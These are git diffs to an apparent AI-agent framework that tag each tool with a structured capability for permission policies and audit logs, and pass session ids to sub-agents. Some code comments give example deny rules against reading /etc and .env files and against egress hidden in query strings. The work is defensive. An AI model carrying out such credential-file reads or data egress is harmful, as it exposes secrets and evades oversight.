+            throw new IllegalArgumentException("glob requires a non-blank pattern");
+        }
+        return new Capability.FileSearch(resolveSearchDir(args), args.get("pattern").asText(), SearchKind.GLOB);
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/GrepSearchTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/GrepSearchTool.java
@@ -3,6 +3,9 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
+import dev.aceclaw.security.SearchKind;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -22,7 +25,7 @@ import java.util.regex.PatternSyntaxException;
  * <p>Walks the file tree and searches each text file for matching lines.
  * Supports optional glob-based file filtering and context lines.
  */
-public final class GrepSearchTool implements Tool {
+public final class GrepSearchTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(GrepSearchTool.class);
 
@@ -301,4 +304,20 @@ public final class GrepSearchTool implements Tool {
     }
 
     private record MatchResult(Path file, int lineNumber, String formattedMatch) {}
+
+    /**
+     * #480 PR 3: structured {@link Capability.FileSearch} with
+     * {@link SearchKind#GREP}. {@code GREP} is heavier than {@code GLOB}
+     * because it opens and reads file content; sharing the same variant
+     * with a {@link SearchKind} discriminator means policies can write
+     * one rule for "deny FileSearch in /etc" and a separate rule for
+     * "deny GREP specifically (don't read .env files)".
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("pattern") || args.get("pattern").asText().isBlank()) {
+            throw new IllegalArgumentException("grep requires a non-blank pattern");
+        }
+        return new Capability.FileSearch(resolveSearchPath(args), args.get("pattern").asText(), SearchKind.GREP);
+    }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/ListDirTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/ListDirTool.java
@@ -3,6 +3,9 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
+import dev.aceclaw.security.SearchKind;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -23,7 +26,7 @@ import java.util.List;
  * <p>Directories are listed first, then files, both sorted alphabetically.
  * Capped at 1000 entries to avoid overwhelming output.
  */
-public final class ListDirTool implements Tool {
+public final class ListDirTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(ListDirTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -152,4 +155,19 @@ public final class ListDirTool implements Tool {
     }
 
     private record Entry(boolean isDir, String name, long size, Instant modified) {}
+
+    /**
+     * #480 PR 3: structured {@link Capability.FileSearch} with
+     * {@link SearchKind#LIST}. Pattern is empty because {@code list_directory}
+     * has no filter — it returns every entry. Sharing {@link Capability.FileSearch}
+     * with {@code glob} and {@code grep} (rather than minting a third
+     * variant) keeps the policy surface compact while still letting a rule
+     * distinguish content reads ({@code GREP}) from name-only views
+     * ({@code GLOB}, {@code LIST}).
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        return new Capability.FileSearch(resolveDir(args == null ? MAPPER.createObjectNode() : args),
+                "", SearchKind.LIST);
+    }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/MemoryTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/MemoryTool.java
@@ -4,6 +4,9 @@ import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
 import dev.aceclaw.memory.AutoMemoryStore;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
+import dev.aceclaw.security.ids.MemoryKey;
 import dev.aceclaw.memory.MemoryEntry;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
@@ -21,7 +24,7 @@ import java.util.stream.Collectors;
  * <p>Supports three actions: save (store a new memory), search (find relevant memories),
  * and list (browse memories by category).
  */
-public final class MemoryTool implements Tool {
+public final class MemoryTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(MemoryTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -279,5 +282,56 @@ public final class MemoryTool implements Tool {
             return input.get(field).asInt(defaultValue);
         }
         return defaultValue;
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.MemoryRead} or
+     * {@link Capability.MemoryWrite} depending on the action. {@code save}
+     * and {@code delete} are both writes — delete drops a row, which is
+     * still a mutating operation even if the visible field changes from
+     * "stored content" to "absent" — so policies that gate memory mutation
+     * cover both. {@code search} and {@code list} are pure reads.
+     *
+     * <p>{@link MemoryKey} is packed with the most-specific identifier the
+     * action can supply (id for delete, query for search, category for
+     * list / save) so PolicyEngine can pattern-match without having to
+     * understand action semantics.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("action") || args.get("action").asText().isBlank()) {
+            throw new IllegalArgumentException("memory requires a non-blank action");
+        }
+        String action = args.get("action").asText().toLowerCase();
+        String tier = (args.has("global") && args.get("global").asBoolean(false)) ? "global" : "project";
+        return switch (action) {
+            case "save" -> {
+                if (!args.has("category") || args.get("category").asText().isBlank()) {
+                    throw new IllegalArgumentException("memory save requires a non-blank category");
+                }
+                yield new Capability.MemoryWrite(new MemoryKey(args.get("category").asText()), tier);
+            }
+            case "delete" -> {
+                if (!args.has("id") || args.get("id").asText().isBlank()) {
+                    throw new IllegalArgumentException("memory delete requires a non-blank id");
+                }
+                yield new Capability.MemoryWrite(new MemoryKey(args.get("id").asText()), tier);
+            }
+            case "search" -> {
+                if (!args.has("query") || args.get("query").asText().isBlank()) {
+                    throw new IllegalArgumentException("memory search requires a non-blank query");
+                }
+                yield new Capability.MemoryRead(new MemoryKey(args.get("query").asText()));
+            }
+            case "list" -> {
+                String key = (args.has("category") && !args.get("category").isNull()
+                        && !args.get("category").asText().isBlank())
+                        ? args.get("category").asText()
+                        : "*";
+                yield new Capability.MemoryRead(new MemoryKey(key));
+            }
+            default -> throw new IllegalArgumentException(
+                    "memory action must be save/search/list/delete; got " + action);
+        };
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/ReadFileTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/ReadFileTool.java
@@ -4,6 +4,8 @@ import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.fasterxml.jackson.databind.node.ObjectNode;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -28,7 +30,7 @@ import java.util.Set;
  * <p>Integrates with {@link WriteFileTool} to track which files have been read,
  * enforcing the read-before-write safety requirement.
  */
-public final class ReadFileTool implements Tool {
+public final class ReadFileTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(ReadFileTool.class);
 
@@ -305,5 +307,23 @@ public final class ReadFileTool implements Tool {
             return input.get(field).asText();
         }
         return defaultValue;
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.FileRead}. Path resolution
+     * matches {@link #execute(String)} so policy and execution see the same
+     * absolute path; otherwise a "deny /etc reads" rule could approve the
+     * relative-path form and refuse only the absolute form, opening a trivial
+     * bypass. Offset/limit args do NOT change the capability — reading bytes
+     * 100-200 of a file is still a {@code FileRead}; range-level policy is
+     * out of scope for the structural variant.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("file_path") || args.get("file_path").asText().isBlank()) {
+            throw new IllegalArgumentException("read_file requires a non-blank file_path");
+        }
+        return new Capability.FileRead(
+                PathResolver.resolve(args.get("file_path").asText(), workingDir));
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/ScreenCaptureTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/ScreenCaptureTool.java
@@ -3,6 +3,8 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -18,7 +20,7 @@ import java.util.concurrent.TimeUnit;
  *
  * <p>macOS only. Supports optional region capture and text extraction.
  */
-public final class ScreenCaptureTool implements Tool {
+public final class ScreenCaptureTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(ScreenCaptureTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -241,5 +243,27 @@ public final class ScreenCaptureTool implements Tool {
             log.warn("OCR failed: {}", e.getMessage());
             return null;
         }
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.ScreenCapture}. Reason is
+     * derived from the args ({@code region} for partial captures, OCR
+     * marker for text-extraction captures) so the audit log and prompt
+     * tell the operator at a glance whether the agent took a full-screen
+     * snapshot for OCR or a small region — surface for downstream privacy
+     * review without inflating the variant payload.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        var reason = new StringBuilder();
+        if (args != null && args.has("region") && !args.get("region").isNull()
+                && !args.get("region").asText().isBlank()) {
+            reason.append("region ").append(args.get("region").asText());
+        }
+        if (args != null && args.has("ocr") && args.get("ocr").asBoolean(false)) {
+            if (reason.length() > 0) reason.append(", ");
+            reason.append("ocr");
+        }
+        return new Capability.ScreenCapture(reason.toString());
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/ScreenCaptureTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/ScreenCaptureTool.java
@@ -255,14 +255,22 @@ public final class ScreenCaptureTool implements Tool, CapabilityAware {
      */
     @Override
     public Capability toCapability(JsonNode args) {
+        // Default to "full screen" so the audit/prompt always says
+        // something concrete — without this, a no-args invocation
+        // produced Capability.ScreenCapture("") which renders as
+        // bare "screen capture" with no detail. CodeRabbit review on #491.
+        boolean hasRegion = args != null && args.has("region") && !args.get("region").isNull()
+                && !args.get("region").asText().isBlank();
+        boolean wantsOcr = args != null && args.has("ocr") && args.get("ocr").asBoolean(false);
+
         var reason = new StringBuilder();
-        if (args != null && args.has("region") && !args.get("region").isNull()
-                && !args.get("region").asText().isBlank()) {
+        if (hasRegion) {
             reason.append("region ").append(args.get("region").asText());
+        } else {
+            reason.append("full screen");
         }
-        if (args != null && args.has("ocr") && args.get("ocr").asBoolean(false)) {
-            if (reason.length() > 0) reason.append(", ");
-            reason.append("ocr");
+        if (wantsOcr) {
+            reason.append(", ocr");
         }
         return new Capability.ScreenCapture(reason.toString());
     }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/SkillTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/SkillTool.java
@@ -11,6 +11,8 @@ import dev.aceclaw.core.agent.SubAgentConfig;
 import dev.aceclaw.core.agent.SubAgentRunner;
 import dev.aceclaw.core.agent.Tool;
 import dev.aceclaw.core.llm.StreamEventHandler;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -27,7 +29,7 @@ import java.util.List;
  *       a sub-agent that runs in isolation via {@link SubAgentRunner}</li>
  * </ul>
  */
-public final class SkillTool implements Tool, CancellationAware {
+public final class SkillTool implements Tool, CapabilityAware, CancellationAware {
 
     private static final Logger log = LoggerFactory.getLogger(SkillTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -204,5 +206,20 @@ public final class SkillTool implements Tool, CancellationAware {
                 handler.onSubAgentEnd("skill:" + skillName);
             }
         }
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.SkillInvoke}. Modelled
+     * separately from {@link Capability.McpInvoke} because skills are
+     * versioned, in-process, first-party code units while MCP is an
+     * out-of-process server — a policy that disables third-party MCP
+     * servers should not also disable first-party skills, and vice versa.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("name") || args.get("name").asText().isBlank()) {
+            throw new IllegalArgumentException("skill requires a non-blank name");
+        }
+        return new Capability.SkillInvoke(args.get("name").asText());
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/SkillTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/SkillTool.java
@@ -193,7 +193,16 @@ public final class SkillTool implements Tool, CapabilityAware, CancellationAware
             handler.onSubAgentStart("skill:" + skillName, prompt);
         }
         try {
-            var result = subAgentRunner.run(subConfig, prompt, handler, cancellationToken);
+            // #457: thread currentSessionId so the forked skill's sub-agent
+            // sees the parent session's allow-list. SkillTool already
+            // tracks currentSessionId via forRequest(...) — we just have to
+            // forward it through the new 5-arg run() overload here.
+            // Without this, every non-read-only tool the forked skill
+            // tries to use gets fail-closed denied, mirroring the original
+            // P1 that motivated #457 — just in a different code path.
+            // (Codex re-review on #491, commit 03472f43b0.)
+            var result = subAgentRunner.run(subConfig, prompt, handler,
+                    cancellationToken, currentSessionId);
             if (result.isEmpty()) {
                 return new ToolResult("Skill '" + skillName + "' completed but produced no output.", false);
             }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
@@ -192,22 +192,17 @@ public final class TaskTool implements Tool, CapabilityAware, CancellationAware 
     }
 
     /**
-     * #480 PR 3: structured {@link Capability.SubAgentSpawn}.
-     *
-     * <p>{@code parentDepth} is recorded as {@code 0} because at the
-     * permission-check moment the tool only sees its own JSON args — it has
-     * no handle to the calling agent's depth. The full provenance chain
-     * captures depth via {@link dev.aceclaw.security.Provenance#subAgentDepth()}
-     * threaded by the agent loop. Future work can stamp a more accurate
-     * depth into the variant if PolicyEngine grows a "deny spawn past depth N"
-     * rule that needs the parent-depth field specifically; until then the
-     * Provenance side carries the truth.
+     * #480 PR 3: structured {@link Capability.SubAgentSpawn}. Depth is
+     * carried by {@link dev.aceclaw.security.Provenance#subAgentDepth()}
+     * on the audit entry, not by the variant — at {@code toCapability}
+     * time we don't have the calling agent's depth in scope, so a
+     * variant-side field would always be wrong for nested spawns.
      */
     @Override
     public Capability toCapability(JsonNode args) {
         if (args == null || !args.has("agent_type") || args.get("agent_type").asText().isBlank()) {
             throw new IllegalArgumentException("task requires a non-blank agent_type");
         }
-        return new Capability.SubAgentSpawn(args.get("agent_type").asText(), 0);
+        return new Capability.SubAgentSpawn(args.get("agent_type").asText());
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
@@ -34,10 +34,43 @@ public final class TaskTool implements Tool, CapabilityAware, CancellationAware 
     private final SubAgentRunner runner;
     private final AgentTypeRegistry typeRegistry;
     private volatile CancellationToken cancellationToken;
+    /**
+     * The calling agent's session id, threaded into
+     * {@link SubAgentRunner#run(SubAgentConfig, String,
+     * dev.aceclaw.core.llm.StreamEventHandler, CancellationToken, String)}
+     * so the per-session permission check (#457) can find the right
+     * allow-list when the sub-agent invokes a tool the user approved in
+     * the parent session. {@code null} on the unbound instance held by
+     * the daemon's tool registry; populated by {@link #forRequest(String)}
+     * just before the tool runs.
+     */
+    private volatile String currentSessionId;
 
     public TaskTool(SubAgentRunner runner, AgentTypeRegistry typeRegistry) {
+        this(runner, typeRegistry, null);
+    }
+
+    private TaskTool(SubAgentRunner runner, AgentTypeRegistry typeRegistry, String currentSessionId) {
         this.runner = runner;
         this.typeRegistry = typeRegistry;
+        this.currentSessionId = currentSessionId;
+    }
+
+    /**
+     * Returns a request-bound {@code TaskTool} so the parent session id
+     * threads into {@link SubAgentRunner}'s loop config. Mirrors
+     * {@code SkillTool.forRequest(...)}; concurrent sessions must not
+     * share a single mutable instance because {@code currentSessionId}
+     * would race between requests.
+     *
+     * <p>Without this, the registry-level instance has
+     * {@code currentSessionId == null}, every {@code runner.run(...)}
+     * call lands in the loop with {@code config.sessionId() == null},
+     * and {@link SubAgentPermissionChecker} fails-closed for every
+     * non-read-only tool — even ones the user already approved.
+     */
+    public TaskTool forRequest(String sessionId) {
+        return new TaskTool(runner, typeRegistry, sessionId);
     }
 
     @Override
@@ -118,10 +151,16 @@ public final class TaskTool implements Tool, CapabilityAware, CancellationAware 
     }
 
     private ToolResult executeSynchronous(SubAgentConfig config, String agentType, String prompt) {
-        log.info("Delegating task to sub-agent '{}': prompt length={}", agentType, prompt.length());
+        log.info("Delegating task to sub-agent '{}': prompt length={}, parentSessionId={}",
+                agentType, prompt.length(), currentSessionId);
 
         try {
-            var result = runner.run(config, prompt, null, cancellationToken);
+            // #457: pass currentSessionId so the sub-agent's permission
+            // check sees the parent session's allow-list. Null means
+            // unbound (registry-level instance) — the runner falls
+            // through to the legacy null-session path which deny-fails
+            // for non-read-only tools. forRequest(...) prevents that.
+            var result = runner.run(config, prompt, null, cancellationToken, currentSessionId);
             if (result.isEmpty()) {
                 return new ToolResult("Sub-agent completed but produced no text output.", false);
             }
@@ -133,10 +172,13 @@ public final class TaskTool implements Tool, CapabilityAware, CancellationAware 
     }
 
     private ToolResult executeBackground(SubAgentConfig config, String agentType, String prompt) {
-        log.info("Launching background sub-agent '{}': prompt length={}", agentType, prompt.length());
+        log.info("Launching background sub-agent '{}': prompt length={}, parentSessionId={}",
+                agentType, prompt.length(), currentSessionId);
 
         try {
-            var task = runner.runInBackground(config, prompt, cancellationToken);
+            // #457: same threading as the synchronous path — the
+            // background task inherits the parent's allow-list scope.
+            var task = runner.runInBackground(config, prompt, cancellationToken, currentSessionId);
             return new ToolResult(
                     "Background task launched successfully.\n" +
                     "Task ID: " + task.taskId() + "\n" +

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/TaskTool.java
@@ -8,6 +8,8 @@ import dev.aceclaw.core.agent.CancellationToken;
 import dev.aceclaw.core.agent.SubAgentConfig;
 import dev.aceclaw.core.agent.SubAgentRunner;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -24,7 +26,7 @@ import org.slf4j.LoggerFactory;
  * <p>Implements {@link CancellationAware} so the parent loop's cancellation
  * token propagates to the sub-agent loop.
  */
-public final class TaskTool implements Tool, CancellationAware {
+public final class TaskTool implements Tool, CapabilityAware, CancellationAware {
 
     private static final Logger log = LoggerFactory.getLogger(TaskTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -145,5 +147,25 @@ public final class TaskTool implements Tool, CancellationAware {
             log.error("Failed to launch background sub-agent '{}': {}", agentType, e.getMessage(), e);
             return new ToolResult("Failed to launch background task: " + e.getMessage(), true);
         }
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.SubAgentSpawn}.
+     *
+     * <p>{@code parentDepth} is recorded as {@code 0} because at the
+     * permission-check moment the tool only sees its own JSON args — it has
+     * no handle to the calling agent's depth. The full provenance chain
+     * captures depth via {@link dev.aceclaw.security.Provenance#subAgentDepth()}
+     * threaded by the agent loop. Future work can stamp a more accurate
+     * depth into the variant if PolicyEngine grows a "deny spawn past depth N"
+     * rule that needs the parent-depth field specifically; until then the
+     * Provenance side carries the truth.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("agent_type") || args.get("agent_type").asText().isBlank()) {
+            throw new IllegalArgumentException("task requires a non-blank agent_type");
+        }
+        return new Capability.SubAgentSpawn(args.get("agent_type").asText(), 0);
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebFetchTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebFetchTool.java
@@ -3,6 +3,8 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.jsoup.Jsoup;
 import org.jsoup.nodes.Element;
 import org.slf4j.Logger;
@@ -21,7 +23,7 @@ import java.time.Duration;
  * <p>Uses {@link java.net.http.HttpClient} for HTTP requests and Jsoup for
  * HTML-to-text conversion. Follows redirects, 30s timeout, 30K char output cap.
  */
-public final class WebFetchTool implements Tool {
+public final class WebFetchTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(WebFetchTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -169,5 +171,28 @@ public final class WebFetchTool implements Tool {
         if (output.length() <= MAX_OUTPUT_CHARS) return output;
         return output.substring(0, MAX_OUTPUT_CHARS) +
                "\n... (output truncated, " + output.length() + " total characters)";
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.HttpFetch}. Method is always
+     * {@code GET} — {@code web_fetch} is read-only by construction (it only
+     * exposes a {@code .GET()} HttpRequest builder). The capability still
+     * reports {@link dev.aceclaw.security.DataFlow#BOTH} (per
+     * {@link Capability.HttpFetch}'s own contract) because GET requests
+     * carry URL/header/cookie payloads outbound and a "block egress" policy
+     * must not be bypassable by hiding data in a query string.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("url") || args.get("url").asText().isBlank()) {
+            throw new IllegalArgumentException("web_fetch requires a non-blank url");
+        }
+        URI uri;
+        try {
+            uri = URI.create(args.get("url").asText().strip());
+        } catch (IllegalArgumentException e) {
+            throw new IllegalArgumentException("web_fetch url is not a valid URI: " + e.getMessage(), e);
+        }
+        return new Capability.HttpFetch(uri, "GET");
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebSearchTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebSearchTool.java
@@ -293,23 +293,35 @@ public final class WebSearchTool implements Tool, CapabilityAware {
 
     /**
      * #480 PR 3: structured {@link Capability.HttpFetch}. The capability
-     * surfaces the actual upstream endpoint ({@code BRAVE_SEARCH_URL} when
-     * the API key is present, {@code DDG_LITE_URL} otherwise) rather than
-     * a fictional "search query" URL — that lets a "deny api.search.brave.com"
-     * policy work without inspecting payload, and lets audit readers see
-     * which backend the search hit. The {@code query} args field is policy-
-     * material but lives in the audit entry's prompt/description, not in
-     * the capability — keeping the variant payload minimal mirrors how
-     * {@link Capability.McpInvoke} omits args.
+     * surfaces both the actual upstream endpoint AND the actual HTTP
+     * method that {@link #execute(String)} will use:
+     *
+     * <ul>
+     *   <li>Brave Search ({@code apiKey} present): {@code GET BRAVE_SEARCH_URL}.</li>
+     *   <li>DuckDuckGo Lite fallback (no key): {@code POST DDG_LITE_URL} —
+     *       see {@code performDdgSearch}, which sends a form-encoded body.</li>
+     * </ul>
+     *
+     * <p>Hard-coding {@code "GET"} for both branches (the original v3 PR
+     * shape) silently misclassified every keyless invocation: an audit
+     * reader saw "GET" for a request that actually went out as "POST",
+     * and any future PolicyEngine rule that distinguishes verbs (e.g.
+     * "deny outbound POST to non-allowlisted hosts") would mis-classify
+     * the DDG path. The capability MUST mirror what the runtime does.
+     *
+     * <p>The {@code query} args field is policy-material but lives in the
+     * audit entry's prompt/description, not in the capability — keeping
+     * the variant payload minimal mirrors how {@link Capability.McpInvoke}
+     * omits args.
      */
     @Override
     public Capability toCapability(JsonNode args) {
         if (args == null || !args.has("query") || args.get("query").asText().isBlank()) {
             throw new IllegalArgumentException("web_search requires a non-blank query");
         }
-        String endpoint = (apiKey != null && !apiKey.isBlank())
-                ? BRAVE_SEARCH_URL
-                : DDG_LITE_URL;
-        return new Capability.HttpFetch(URI.create(endpoint), "GET");
+        boolean useBrave = apiKey != null && !apiKey.isBlank();
+        return new Capability.HttpFetch(
+                URI.create(useBrave ? BRAVE_SEARCH_URL : DDG_LITE_URL),
+                useBrave ? "GET" : "POST");
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebSearchTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/WebSearchTool.java
@@ -3,6 +3,8 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.jsoup.Jsoup;
 import org.jsoup.nodes.Document;
 import org.jsoup.nodes.Element;
@@ -27,7 +29,7 @@ import java.util.List;
  * higher-quality results. Otherwise, falls back to DuckDuckGo Lite (free,
  * no API key required).
  */
-public final class WebSearchTool implements Tool {
+public final class WebSearchTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(WebSearchTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -288,4 +290,26 @@ public final class WebSearchTool implements Tool {
      * A single DuckDuckGo search result.
      */
     record DdgResult(String title, String url, String snippet) {}
+
+    /**
+     * #480 PR 3: structured {@link Capability.HttpFetch}. The capability
+     * surfaces the actual upstream endpoint ({@code BRAVE_SEARCH_URL} when
+     * the API key is present, {@code DDG_LITE_URL} otherwise) rather than
+     * a fictional "search query" URL — that lets a "deny api.search.brave.com"
+     * policy work without inspecting payload, and lets audit readers see
+     * which backend the search hit. The {@code query} args field is policy-
+     * material but lives in the audit entry's prompt/description, not in
+     * the capability — keeping the variant payload minimal mirrors how
+     * {@link Capability.McpInvoke} omits args.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("query") || args.get("query").asText().isBlank()) {
+            throw new IllegalArgumentException("web_search requires a non-blank query");
+        }
+        String endpoint = (apiKey != null && !apiKey.isBlank())
+                ? BRAVE_SEARCH_URL
+                : DDG_LITE_URL;
+        return new Capability.HttpFetch(URI.create(endpoint), "GET");
+    }
 }

--- a/aceclaw-tools/src/test/java/dev/aceclaw/tools/SkillToolTest.java
+++ b/aceclaw-tools/src/test/java/dev/aceclaw/tools/SkillToolTest.java
@@ -3,11 +3,27 @@ package dev.aceclaw.tools;
 import dev.aceclaw.core.agent.SkillConfig;
 import dev.aceclaw.core.agent.SkillContentResolver;
 import dev.aceclaw.core.agent.SkillRegistry;
+import dev.aceclaw.core.agent.SubAgentPermissionChecker;
+import dev.aceclaw.core.agent.SubAgentRunner;
+import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.core.agent.ToolPermissionChecker;
+import dev.aceclaw.core.agent.ToolPermissionResult;
+import dev.aceclaw.core.agent.ToolRegistry;
+import dev.aceclaw.core.llm.ContentBlock;
+import dev.aceclaw.core.llm.LlmClient;
+import dev.aceclaw.core.llm.LlmRequest;
+import dev.aceclaw.core.llm.LlmResponse;
+import dev.aceclaw.core.llm.StopReason;
+import dev.aceclaw.core.llm.StreamEvent;
+import dev.aceclaw.core.llm.StreamEventHandler;
+import dev.aceclaw.core.llm.StreamSession;
+import dev.aceclaw.core.llm.Usage;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.io.TempDir;
 
 import java.nio.file.Path;
 import java.util.List;
+import java.util.concurrent.CopyOnWriteArrayList;
 
 import static org.assertj.core.api.Assertions.assertThat;
 
@@ -42,6 +58,113 @@ class SkillToolTest {
 
         assertThat(result.isError()).isFalse();
         assertThat(result.output()).contains("summarize issues");
+    }
+
+    @Test
+    void forkedSkillThreadsParentSessionIdIntoSubAgentPermissionCheck() throws Exception {
+        // Regression test for the Codex P1 finding on commit 03472f43b0:
+        // SkillTool.executeFork previously called subAgentRunner.run(...) via
+        // the legacy 4-arg overload, which silently dropped the parent
+        // session id. Since #457's fail-closed null-session guard, this
+        // meant every non-read-only tool a forked skill tried to use was
+        // denied — mirroring the original P1 that motivated #457 for
+        // TaskTool, but in the symmetric SkillTool code path which was
+        // overlooked when the TaskTool fix landed.
+        //
+        // The spy here captures the sessionId argument the loop hands to
+        // the permission checker; the assertion is that the parent session
+        // id reaches it, not null.
+        var capturedSessionIds = new CopyOnWriteArrayList<String>();
+        ToolPermissionChecker spy = (toolName, inputJson, sessionId) -> {
+            capturedSessionIds.add(sessionId == null ? "<null>" : sessionId);
+            // ALLOW so the loop progresses through one tool call to end-of-turn.
+            return ToolPermissionResult.ALLOWED;
+        };
+
+        // Sub-agent runner with the spy attached and one tool registered for
+        // the forked skill to invoke.
+        var parentRegistry = new ToolRegistry();
+        parentRegistry.register(new Tool() {
+            @Override public String name() { return "write_file"; }
+            @Override public String description() { return "stub"; }
+            @Override public com.fasterxml.jackson.databind.JsonNode inputSchema() {
+                return new com.fasterxml.jackson.databind.ObjectMapper().createObjectNode();
+            }
+            @Override public Tool.ToolResult execute(String inputJson) {
+                return new Tool.ToolResult("ok", false);
+            }
+        });
+        var runner = new SubAgentRunner(
+                new ToolUseOnceMockLlm(),
+                parentRegistry, "mock-model", tempDir, 4096, 0, spy, null);
+
+        // SkillTool wired to that runner, with one FORK-mode skill.
+        var skillRegistry = SkillRegistry.empty();
+        skillRegistry.registerRuntime("session-A", new SkillConfig(
+                "review-and-write",
+                "Test fork-mode skill",
+                null,
+                SkillConfig.ExecutionContext.FORK,
+                null,
+                List.of("write_file"),
+                4,
+                true,
+                false,
+                "Write a file.",
+                tempDir.resolve(".aceclaw/runtime-skills/review-and-write")));
+
+        var skillTool = new SkillTool(skillRegistry, new SkillContentResolver(tempDir), runner);
